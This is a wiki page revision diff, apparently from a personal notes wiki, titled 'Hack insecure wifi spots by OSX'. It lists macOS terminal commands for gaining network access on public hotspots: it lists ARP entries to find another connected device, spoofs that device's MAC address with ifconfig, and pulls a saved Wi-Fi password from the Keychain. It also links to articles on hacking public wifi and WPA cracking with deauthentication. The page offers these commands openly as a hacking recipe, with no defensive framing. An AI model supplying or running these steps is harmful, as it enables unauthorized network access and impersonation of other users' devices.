Hack insecure wifi spots by OSX: Difference between revisions
Jump to navigation
Jump to search
(Created page with "<syntaxhighlight lang="bash"> # fist connect to any unsecured networks # search node arp -ani en0 # ? (192.168.43.1) at 18:89:ab:f0:ab:c7 on en0 ifscope [ethernet] # ? (224.0....") |
|||
(2 intermediate revisions by the same user not shown) | |||
Line 3: | Line 3: | ||
# search node | # search node | ||
arp -ani en0 | arp -ani en0 | ||
# ? (192.168.43.1) at 18:89:ab:f0:ab:c7 on en0 ifscope [ethernet] | # ? (192.168.43.1) at 18:89:ab:f0:ab:c7 on en0 ifscope [ethernet] | ||
# ? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet] | # ? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet] | ||
# ? (239.255.255.250) at 1:0:5e:7f:ff:fa on en0 ifscope permanent [ethernet] | # ? (239.255.255.250) at 1:0:5e:7f:ff:fa on en0 ifscope permanent [ethernet] | ||
# change your mac address from terminal | |||
sudo ifconfig en0 ether 18:89:ab:f0:ab:c7 | sudo ifconfig en0 ether 18:89:ab:f0:ab:c7 | ||
# recover forgotten password of your wifi spots | |||
security find-generic-password -ga "ChorkeOrg" | grep "password:" | |||
</syntaxhighlight> | </syntaxhighlight> | ||
== References == | == References == | ||
* [https://medium.com/@Zyklus/hacking-public-wifi-spots-on-osx-for-fun-and-profit-85072816530a Hacking public wifi spots (on OSX) for fun and profit!] | * [https://medium.com/@Zyklus/hacking-public-wifi-spots-on-osx-for-fun-and-profit-85072816530a Hacking public wifi spots (on OSX) for fun and profit!] | ||
* [https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html WPA wifi cracking on a MacBook Pro with deauth] |
Latest revision as of 02:28, 25 May 2018
# fist connect to any unsecured networks
# search node
arp -ani en0
# ? (192.168.43.1) at 18:89:ab:f0:ab:c7 on en0 ifscope [ethernet]
# ? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet]
# ? (239.255.255.250) at 1:0:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
# change your mac address from terminal
sudo ifconfig en0 ether 18:89:ab:f0:ab:c7
# recover forgotten password of your wifi spots
security find-generic-password -ga "ChorkeOrg" | grep "password:"